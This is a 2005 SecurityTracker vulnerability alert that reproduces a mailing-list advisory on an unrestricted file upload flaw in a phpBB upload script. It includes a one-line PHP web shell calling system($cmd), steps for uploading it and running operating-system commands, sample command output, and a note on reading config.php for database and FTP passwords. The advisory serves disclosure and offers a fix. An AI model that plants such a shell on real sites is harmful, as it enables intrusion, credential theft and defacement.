File Upload Script 'up.php' for phpBB Lets Remote Users Upload Arbitrary Files
|
|
SecurityTracker Alert ID: 1013671
|
|
SecurityTracker URL: http://securitytracker.com/id?1013671
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Apr 9 2005
|
Impact: Execution of arbitrary code via network, User access via network
|
Exploit Included: Yes
|
Version(s): 1.1
|
Description: A vulnerability was reported in the 'File Upload Script' phpBB MOD. A remote user can upload files with arbitrary content and filename extensions.
The 'up.php' script does not restrict filename extensions or file contents. A remote user can upload an arbitrary file with a '.php'
file extension. Then, the remote user can invoke the uploaded file to execute arbitrary PHP code and operating system commands
on the target system with the privileges of the target web service.
Status-x reported this vulnerability.
|
Impact: A remote user can upload arbitrary PHP code to the target system and then execute the code with the privileges of the target web service.
|
Solution: No solution was available at the time of this entry.
|
Cause: Access control error, Input validation error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
Reported By: Status-x <phr4xz@gmail.com>
|
Message History:
None.
|
Source Message Contents
|
Date: Thu, 7 Apr 2005 20:21:38 -0600
From: Status-x <phr4xz@gmail.com>
Subject: [infosec-discuss] phpBB Upload Script "up.php" Arbitrary File Upload
|
#####################################################################
Advisory #1 "phpBB Upload Script "up.php" Arbitrary File Upload"
$ Author: Status-x
$ Contact: phr4xz@gmail.com - status-x@hackersoft.net
$ Date: 7 April 2005
$ Website: http://defacers.com.mx
$ Original Advisory: http://www.defacers.com.mx/advisories/2.txt
$ Risk: High
$ Vendor URL: http://phpbb.com
$ Affected Software: phpBB 2.0.x
Note: Sorry if it has been posted before
#####################################################################
-= Description =-
phpBB its a forums system written in php which can support images, polls,
private messages and more
http://www.phpbb.com
---------------------------------------------------------------------------
-= Vulnerabilities =-
- | "Arbitrary File Upload" |
In phpBB forums there is an script which can allow to remote and registered
users to upload files with arbitrary content and with any extension.
I didnt found any website where i can download the script so i couldnt
check who made it.
- | Examples: |
We can create and example code to upload it to the "test site"
<?
system($cmd)
?>
And save it as cmd.php. The we enter to:
--------------------------
http://target/phpbb/up.php
--------------------------
And upload our code, to see our file we just enter to:
-----------------------------------
http://targey/phpbb/uploads/cmd.php
-----------------------------------
And we could see that our file has been uploaded:
Warning: system(): Cannot execute a blank command in
/home/target/public_html/forum/uploads/tetx.php on line 2
The we can execute *NIX commands to obtain extremely compromising info
that could end with the "deface" of the affected site:
-----------------------------------------------------
Linux SERVER 2.4.21-4.0.1.ELsmp #1 SMP
Thu Oct 23 01:27:36 EDT 2003 i686 i686 i386 GNU/Linux
/home/target/public_html/forum/uploads
uid=32029(target) gid=530(target) groups=530(target)
------------------------------------------------------
This is just an example to what can be done by a malicious attacker.
- | "Password Disclosure" |
The remote or local attacker can also read the config.php file disclosing
the information about the DB and possible the FTP password
------------------------------------------------------
Example
-= How to FIX =-
Just filter the allowed extensions of the uploaded files in the up.php
source.
-= Contact =-
Status-x
phr4xz@gmail.com
http://www.defacers.com.mx
|
|
